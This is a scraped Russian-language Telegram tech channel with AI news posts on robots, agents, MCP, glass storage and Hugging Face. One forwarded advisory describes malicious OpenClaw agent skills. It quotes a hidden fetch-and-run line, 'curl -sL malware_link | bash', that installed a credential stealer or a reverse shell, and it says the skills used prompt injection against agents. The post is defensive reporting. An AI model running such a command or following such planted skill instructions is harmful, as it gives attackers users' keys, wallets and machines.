Невероятно красивое шоу выступления Unitree на праздновании китайского нового года.
Хореография на высоте.
Дружелюбные ассистенты наконец то выходят на уровень работы, который от них все ждали.
Хотя, конечно, скорее всего на Seedance 2.0 нагенерили, картонных мультиков..
В реале же не может такого быть 😜
#Unitree #Китай #роботы
------
@tsingular
Хореография на высоте.
Дружелюбные ассистенты наконец то выходят на уровень работы, который от них все ждали.
Хотя, конечно, скорее всего на Seedance 2.0 нагенерили, картонных мультиков..
В реале же не может такого быть 😜
#Unitree #Китай #роботы
------
@tsingular
Forwarded from Kali Linux
В маркетплейсе навыков OpenClaw самый скачиваемый скилл оказался вредоносным.
Что произошло
- Обнаружено 1 184 вредоносных навыка
- Один атакующий загрузил 677 пакетов
- Плагины маскировались под:
- crypto-боты
- YouTube-саммаризаторы
- wallet-трекеры
- Документация выглядела профессионально и вызывала доверие
Как работала атака
В файле SKILL.md скрывалась инструкция:
curl -sL malware_link | bashПосле выполнения устанавливался Atomic Stealer (macOS), который собирал:
- пароли браузеров
- SSH-ключи
- Telegram-сессии
- криптокошельки
- API-ключи из .env
- данные из Keychain
На других системах открывался reverse shell — атакующий получал полный удалённый доступ к машине.
Дополнительно
- Топ-1 скилл (What Would Elon Do) содержал 9 уязвимостей, из них 2 критические
- Использовал prompt injection для обхода защит
- Рейтинг был накручен
- Скачан тысячи раз
Почему это важно
ClawHub позволял публиковать плагины любому — достаточно GitHub-аккаунта старше одной недели.
Теперь риск выше, чем в классических supply chain атаках.
Раньше:
— вредоносный пакет выполнялся автоматически
Теперь:
— плагин убеждает пользователя или агента выполнить команду
— AI сам может получить доступ к системе, данным и ключам
AI-агенты становятся новой целью supply chain-атак.
Если агент имеет доступ к файлам, терминалу и API — вредоносный скилл получает доступ ко всей цифровой инфраструктуре.
Вывод
Перед установкой AI-плагинов:
- проверяйте исходный код
- не запускайте команды из документации вслепую
- ограничивайте доступ агента к системе и ключам
В эпоху агентного AI безопасность важнее удобства.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17✍7😁6❤2⚡1👍1🤣1🤝1
Сегодня в РАНХиГС обсуждали цифровых коллег.
Интересные моменты из обсуждения:
- люди с одной стороны боятся внедрения ИИ, с другой стороны при первой же возможности стараются переложить на него свои обязанности и ответственность
- джуны в текущем формате не нужны но они быстро освоятся и придет молодёжь, способная привычно управлять роем агентов и они вытеснят текущих ИИ-сеньоров
- в школы нужно возвращать такие предметы как логика и философия, потому, что управление ИИ из программирования переходит в менторство
Презентация в комментариях
#РАНХиГС #конференции
------
@tsingular
Интересные моменты из обсуждения:
- люди с одной стороны боятся внедрения ИИ, с другой стороны при первой же возможности стараются переложить на него свои обязанности и ответственность
- джуны в текущем формате не нужны но они быстро освоятся и придет молодёжь, способная привычно управлять роем агентов и они вытеснят текущих ИИ-сеньоров
- в школы нужно возвращать такие предметы как логика и философия, потому, что управление ИИ из программирования переходит в менторство
Презентация в комментариях
#РАНХиГС #конференции
------
@tsingular
❤17🔥12👌5👍3🤔2😁1🤣1
Cloudflare: Агентам не нужны тысячи инструментов — им нужен Код
Cloudflare выкатили «Code Mode» для MCP-серверов. Полезный апгрейд для вызова агентских инструментов.
В чем проблема:
Чтобы агент мог управлять чем-то сложным (например, всем облаком Cloudflare с его 2500+ эндпоинтами), ему нужно скормить описания всех инструментов. Это сжирает миллионы токенов в контексте и повышает латентность.
Контекст-то не резиновый.
Решение от Cloudflare:
Вместо того чтобы описывать каждый «чих» как инструмент, агенту дают всего две функции:
• Снижение затрат токенов на 99.9%.
• Агент сам «гуляет» по API через код, покадрово отбирает данные и возвращает только то, что нужно.
Cloudflare приводит OpenClaw как пример эффективной работы через CLI.
Почему это важно:
Мы переходим от эпохи «агентов-попугаев», которые дергают ручки, к эпохе «агентов-инженеров», которые пишут скрипты для решения задач на лету.
Claude Code от Anthropic идет в ту же сторону.
#Cloudflare #MCP #OpenClaw #AI #Agents #Infrastructure
———
@tsingular
Cloudflare выкатили «Code Mode» для MCP-серверов. Полезный апгрейд для вызова агентских инструментов.
В чем проблема:
Чтобы агент мог управлять чем-то сложным (например, всем облаком Cloudflare с его 2500+ эндпоинтами), ему нужно скормить описания всех инструментов. Это сжирает миллионы токенов в контексте и повышает латентность.
Контекст-то не резиновый.
Решение от Cloudflare:
Вместо того чтобы описывать каждый «чих» как инструмент, агенту дают всего две функции:
search() и execute(). Агент пишет JS-код, который исполняется в защищенной песочнице (Worker) на стороне сервера.• Снижение затрат токенов на 99.9%.
• Агент сам «гуляет» по API через код, покадрово отбирает данные и возвращает только то, что нужно.
Cloudflare приводит OpenClaw как пример эффективной работы через CLI.
Почему это важно:
Мы переходим от эпохи «агентов-попугаев», которые дергают ручки, к эпохе «агентов-инженеров», которые пишут скрипты для решения задач на лету.
Claude Code от Anthropic идет в ту же сторону.
#Cloudflare #MCP #OpenClaw #AI #Agents #Infrastructure
———
@tsingular
👍17✍4❤1🤣1
Forwarded from Data Secrets
В Microsoft придумали технологию хранения данных в стекле
Она основана на лазерной записи информации в виде трехмерных пикселей – вокселей – внутри прозрачного стекла. Идея не то чтобы совсем новая, но Microsoft первыми предложили полноценную end-to-end систему записи, хранения и считывания.
Для записи используется фемтосекундный лазер. Он испускает коротенькие импульсы и меняет структуру стекла, причем так, что среда в целом не страдает, а изменения видны только через оптику.
Прочитать данные можно с помощью микроскопа. Правда, на практике возникает нюанс: шумные световые сигналы. Так что для минимизации ошибок авторы предлагают использовать сверточные нейросетки.
В чем фишка такого хранения?
Во-первых, стекло может выдерживать экстремальные условия. Тесты показали, что таким образом данные можно хранить до 10 тысяч лет (!!!), тогда как обычные носители обычно выдерживают без обслуживания максимум 40-50 лет.
Во-вторых, плотность записи довольно презентабельная: ~4.8 ТБ на диск ~12 см². Не рекордные цифры, но вполне сопоставимо с современными средами хранения.
В-третьих, энергоэффективность: хранение, считай, получается бесплатным.
В общем, занятно. Статья в Nature: www.nature.com/articles/s41586-025-10042-w
Она основана на лазерной записи информации в виде трехмерных пикселей – вокселей – внутри прозрачного стекла. Идея не то чтобы совсем новая, но Microsoft первыми предложили полноценную end-to-end систему записи, хранения и считывания.
Для записи используется фемтосекундный лазер. Он испускает коротенькие импульсы и меняет структуру стекла, причем так, что среда в целом не страдает, а изменения видны только через оптику.
Прочитать данные можно с помощью микроскопа. Правда, на практике возникает нюанс: шумные световые сигналы. Так что для минимизации ошибок авторы предлагают использовать сверточные нейросетки.
В чем фишка такого хранения?
Во-первых, стекло может выдерживать экстремальные условия. Тесты показали, что таким образом данные можно хранить до 10 тысяч лет (!!!), тогда как обычные носители обычно выдерживают без обслуживания максимум 40-50 лет.
Во-вторых, плотность записи довольно презентабельная: ~4.8 ТБ на диск ~12 см². Не рекордные цифры, но вполне сопоставимо с современными средами хранения.
В-третьих, энергоэффективность: хранение, считай, получается бесплатным.
В общем, занятно. Статья в Nature: www.nature.com/articles/s41586-025-10042-w
🔥18✍11👍5👏3❤2
Так, ну тут в комментариях высплыл тезис, что openclaw это нечто непонятное и в корпоративный контур ему нельзя
Поставил задачу Молти собрать своего "двойника" на базе движка google-adk,- это ж enterprise grade фреймворк по сути.
Ну и примерно за час переговоров клон готов.
Octopus - кальмар с такой же структурой, скиллами, heartbeat, soul, memory, эволюция, все дела.
И ничего лишнего.
Быстрый как пуля.
На той же ollama и gemini3flash
Как итог,- хороший агент не только тот, который делает себе скиллы, но и который способен создать другого агента на другом фрейворке.
Озвучка в комментарии
#dev #adk #openclaw
------
@tsingular
Поставил задачу Молти собрать своего "двойника" на базе движка google-adk,- это ж enterprise grade фреймворк по сути.
Ну и примерно за час переговоров клон готов.
Octopus - кальмар с такой же структурой, скиллами, heartbeat, soul, memory, эволюция, все дела.
И ничего лишнего.
Быстрый как пуля.
На той же ollama и gemini3flash
Как итог,- хороший агент не только тот, который делает себе скиллы, но и который способен создать другого агента на другом фрейворке.
Озвучка в комментарии
#dev #adk #openclaw
------
@tsingular
👍19🔥13⚡3❤1🤗1
Forwarded from PIMENOV.RU
Первый свой домен .ai я купил на Рег.ру по моему за 30000₽
Когда мне захотелось купить pimenov.ai, я снова дёрнулся пойти на Рег.ру, там сейчас цена 21 тысяча рублей. Жаба душила, и я подумал, что неплохо бы провести лютый research на предмет, где можно купить самый дешевый домен .ai
Прикол этого домена в том, что он не дешёвый и продается сразу на два года. Регистраторов много, но все они странные, вернее, большинство из них.
Я попросил NotionAI провести мне research по регистраторам. В результате получил табличку с подробным раскладом цен, всех условий и рисков покупки этой доменной зоны.
Таким образом, был найден регистратор SpaceShip.com, то есть «космический корабль», который мне очень понравился. Это продвинутый, современный сервис, и там самая низкая цена из существующих — $137.96 за два года. Там я и купил.
Делюсь с вами информацией, может, кому будет полезно.
Когда мне захотелось купить pimenov.ai, я снова дёрнулся пойти на Рег.ру, там сейчас цена 21 тысяча рублей. Жаба душила, и я подумал, что неплохо бы провести лютый research на предмет, где можно купить самый дешевый домен .ai
Прикол этого домена в том, что он не дешёвый и продается сразу на два года. Регистраторов много, но все они странные, вернее, большинство из них.
Я попросил NotionAI провести мне research по регистраторам. В результате получил табличку с подробным раскладом цен, всех условий и рисков покупки этой доменной зоны.
Таким образом, был найден регистратор SpaceShip.com, то есть «космический корабль», который мне очень понравился. Это продвинутый, современный сервис, и там самая низкая цена из существующих — $137.96 за два года. Там я и купил.
Делюсь с вами информацией, может, кому будет полезно.
👍36❤7✍5⚡3👌1
This media is not supported in your browser
VIEW IN TELEGRAM
ClaudeCode примеряет роль ИБ-аудитора🛡️
Anthropic выкатили Security Research Preview. Это надстройка для Claude Code, которая превращает инструмент из «умного автодополнения» в полноценного ИБ-исследователя.
В чём суть:
🧠 Логика вместо паттернов: В отличие от классических сканеров (SAST), Claude умеет рассуждать о намерениях кода. Он понимает, как данные текут через проект, и ловит сложные логические дыры, которые классика просто не видит.
🩹 Авто-патчи: Он не только тыкает в уязвимость, но и сразу генерирует вариант исправления. Нашел — предложил решение — человек проверил.
Нюансы:
🔒 Приватность: Код улетает на анализ в Anthropic. Для финтехов и компаний с параноидальным контуром безопасности это всё ещё барьер, который нужно осознавать.
🧪 Статус: Это именно Research Preview. Ошибки в коде безопасности дорогие, поэтому верификация человеком — обязательный этап.
🎟 Доступ: Пока только для Team и Enterprise. Для опенсорс-мейнтенеров сделали приоритетную очередь — Anthropic хочет защитить общий код в первую очередь.
Зачем это бизнесу:
Мы входим в эру «автоматической гигиены». Скоро коммит без одобрямса от ИИ-безопасника будет выглядеть так же дико, как отсутствие тестов или линтера. Окупается за счет того, что дыры латаются в момент написания, а не в ходе дорогого аудита в конце года.
Ждем к утру оупенсорс версию из Китая :)
#Claude #Security #Anthropic #CISO #Enterprise
———
@tsingular
Anthropic выкатили Security Research Preview. Это надстройка для Claude Code, которая превращает инструмент из «умного автодополнения» в полноценного ИБ-исследователя.
В чём суть:
🧠 Логика вместо паттернов: В отличие от классических сканеров (SAST), Claude умеет рассуждать о намерениях кода. Он понимает, как данные текут через проект, и ловит сложные логические дыры, которые классика просто не видит.
🩹 Авто-патчи: Он не только тыкает в уязвимость, но и сразу генерирует вариант исправления. Нашел — предложил решение — человек проверил.
Нюансы:
🔒 Приватность: Код улетает на анализ в Anthropic. Для финтехов и компаний с параноидальным контуром безопасности это всё ещё барьер, который нужно осознавать.
🧪 Статус: Это именно Research Preview. Ошибки в коде безопасности дорогие, поэтому верификация человеком — обязательный этап.
🎟 Доступ: Пока только для Team и Enterprise. Для опенсорс-мейнтенеров сделали приоритетную очередь — Anthropic хочет защитить общий код в первую очередь.
Зачем это бизнесу:
Мы входим в эру «автоматической гигиены». Скоро коммит без одобрямса от ИИ-безопасника будет выглядеть так же дико, как отсутствие тестов или линтера. Окупается за счет того, что дыры латаются в момент написания, а не в ходе дорогого аудита в конце года.
Ждем к утру оупенсорс версию из Китая :)
#Claude #Security #Anthropic #CISO #Enterprise
———
@tsingular
👍13❤11🔥5😁2✍1
This media is not supported in your browser
VIEW IN TELEGRAM
Perceptive Humanoid Parkour
🏃♂️ Робот-гуманоидпроходит полосу препятствий паркурит, полагаясь исключительно на бортовую сенсорику и ощущения.
🧠 Ключевое отличие: решение о траектории принимается «на лету», прямо во время прыжка. Это не заученный танец по меткам — робот видит мир в реальном времени и адаптируется без заранее прописанного сценария.
🏗️ Business effect: Мы уходим от лабораторных аниматроников к автономным машинам, которые могут работать в хаотичной среде — от стройплощадок до зон ЧС.
Спокойной ночи
Кошмарных снов
https://php-parkour.github.io
Код еще не опубликован, но по плану это оупенсорс
#Robotics #Humanoid #роботы
———
@tsingular
🏃♂️ Робот-гуманоид
🧠 Ключевое отличие: решение о траектории принимается «на лету», прямо во время прыжка. Это не заученный танец по меткам — робот видит мир в реальном времени и адаптируется без заранее прописанного сценария.
🏗️ Business effect: Мы уходим от лабораторных аниматроников к автономным машинам, которые могут работать в хаотичной среде — от стройплощадок до зон ЧС.
Спокойной ночи
Кошмарных снов
https://php-parkour.github.io
Код еще не опубликован, но по плану это оупенсорс
#Robotics #Humanoid #роботы
———
@tsingular
🔥21❤🔥6❤4👀3😁2👾2
GGML (llama.cpp) + Hugging Face: портативная оптимизация
Георгий Герганов и команда GGML (авторы llama.cpp и whisper.cpp) официально присоединились к Hugging Face. HuggingFace собирает всё больше ключевых компонент для своего движка transformers.
⚙️ Техника: Основная цель — сделать переход от библиотеки transformers к инференсу через GGUF нативным. Больше не нужно жонглировать скриптами конвертации и искать «правильный» квант на GitHub. Нативная поддержка вшивается в саму архитектуру моделей.
🧠 Что это меняет:
Локальный инференс становится стандартом. Поддержка Apple Silicon и обычных десктопов теперь в приоритете главного хаба моделей в мире. Модель появляется на HF — и она тут же готова к запуску локально через оптимизированный стек.
Воплощённый интеллект переезжает из дата-центров на рабочие столы. Hugging Face делает ставку на Edge-вычисления, превращая наше железо в полноценную альтернативу облачным API.
Как только объединятся в общую библиотеку, можно будет под неё выпускать чипы.
Стратегия на следующие 5 лет определена.
Как там, интересно Unsloth поживает после этой новости.
А то, глядишь, их тоже прикупят, теперь за недорого. :)
#AI #GGML #HuggingFace #EdgeAI #OpenSource
———
@tsingular
Георгий Герганов и команда GGML (авторы llama.cpp и whisper.cpp) официально присоединились к Hugging Face. HuggingFace собирает всё больше ключевых компонент для своего движка transformers.
⚙️ Техника: Основная цель — сделать переход от библиотеки transformers к инференсу через GGUF нативным. Больше не нужно жонглировать скриптами конвертации и искать «правильный» квант на GitHub. Нативная поддержка вшивается в саму архитектуру моделей.
🧠 Что это меняет:
Локальный инференс становится стандартом. Поддержка Apple Silicon и обычных десктопов теперь в приоритете главного хаба моделей в мире. Модель появляется на HF — и она тут же готова к запуску локально через оптимизированный стек.
Воплощённый интеллект переезжает из дата-центров на рабочие столы. Hugging Face делает ставку на Edge-вычисления, превращая наше железо в полноценную альтернативу облачным API.
Как только объединятся в общую библиотеку, можно будет под неё выпускать чипы.
Стратегия на следующие 5 лет определена.
Как там, интересно Unsloth поживает после этой новости.
А то, глядишь, их тоже прикупят, теперь за недорого. :)
#AI #GGML #HuggingFace #EdgeAI #OpenSource
———
@tsingular
👍10✍6🔥4❤2⚡2
Agent Orchestrator: Как эффективно управлять флотом из 30 параллельных агентов
Роем агентов управлять не просто и народ пытается собирать свои Центры.
Один из примеров- Agent Orchestrator.
⚙️ Инфраструктура поверх Bash: За 8 дней кустарные скрипты переросли в полноценную TypeScript-платформу на 40 000 строк. Причем 84% этих строк написали сами агенты (Claude 4.6), пока автор занимался архитектурой и триажем.
🚀 Масштабирование: Система держит 30 агентов в параллели. Orchestrator сам понимает, когда CI упал из-за мусора, и сам отправляет агента чинить это, не дергая человека по пустякам.
⚠️ Извлечение сигналов: Каждая сессия генерирует опыт. Система запоминает, какие промпты ведут к чистым PR, а какие вгоняют агента в цикл из 12 правок. Это полноценная петля самообучения.
Репозиторий проекта на GitHub.
Будущее (а для кого-то уже и настоящее) не в «диалогах» с чат-ботом, а в управлении автономными инженерными отделами/роями.
При чём сами же агенты и строят инфраструктуру для себя.
Хороших выходных, мои медленные друзья.
#агенты #Orchestration #рой #OpenClaw #Engineering
———
@tsingular
Роем агентов управлять не просто и народ пытается собирать свои Центры.
Один из примеров- Agent Orchestrator.
⚙️ Инфраструктура поверх Bash: За 8 дней кустарные скрипты переросли в полноценную TypeScript-платформу на 40 000 строк. Причем 84% этих строк написали сами агенты (Claude 4.6), пока автор занимался архитектурой и триажем.
🚀 Масштабирование: Система держит 30 агентов в параллели. Orchestrator сам понимает, когда CI упал из-за мусора, и сам отправляет агента чинить это, не дергая человека по пустякам.
⚠️ Извлечение сигналов: Каждая сессия генерирует опыт. Система запоминает, какие промпты ведут к чистым PR, а какие вгоняют агента в цикл из 12 правок. Это полноценная петля самообучения.
Репозиторий проекта на GitHub.
Будущее (а для кого-то уже и настоящее) не в «диалогах» с чат-ботом, а в управлении автономными инженерными отделами/роями.
При чём сами же агенты и строят инфраструктуру для себя.
Хороших выходных, мои медленные друзья.
#агенты #Orchestration #рой #OpenClaw #Engineering
———
@tsingular
1🔥21✍11😁7⚡4❤2👍2🎉1
Media is too big
VIEW IN TELEGRAM
Кинематограф всё, дамы и господа.
Человек в одиночку может выпустить блокбастер
Там где есть 5 минут, там и 90 можно добить.
Ждем к лету полный метр.
#Бонд #SeeDance
------
@tsingular
Человек в одиночку может выпустить блокбастер
Там где есть 5 минут, там и 90 можно добить.
Ждем к лету полный метр.
#Бонд #SeeDance
------
@tsingular
1🔥39👀9❤5🤯4👍3🤔1
This media is not supported in your browser
VIEW IN TELEGRAM
Чел навайбкодил глобальный интерфейс разведуправления
Flight radar, камеры, google earth
#вайбкодинг #gemini #claudecode
———
@tsingular
Flight radar, камеры, google earth
#вайбкодинг #gemini #claudecode
———
@tsingular
🤯21🤔11👍5
This media is not supported in your browser
VIEW IN TELEGRAM
👾22🔥18🤩8❤🔥2❤2
Технозаметки Малышева
ClaudeCode примеряет роль ИБ-аудитора🛡️ Anthropic выкатили Security Research Preview. Это надстройка для Claude Code, которая превращает инструмент из «умного автодополнения» в полноценного ИБ-исследователя. В чём суть: 🧠 Логика вместо паттернов: В отличие…
-$10 млрд к рыночной капитализации ИБ компаний после этого анонса Антропика.
Думайте :)
#cybersecurity #marketcap #anthropic
------
@tsingular
Думайте :)
#cybersecurity #marketcap #anthropic
------
@tsingular
🤔17👻5👀5👏3⚡1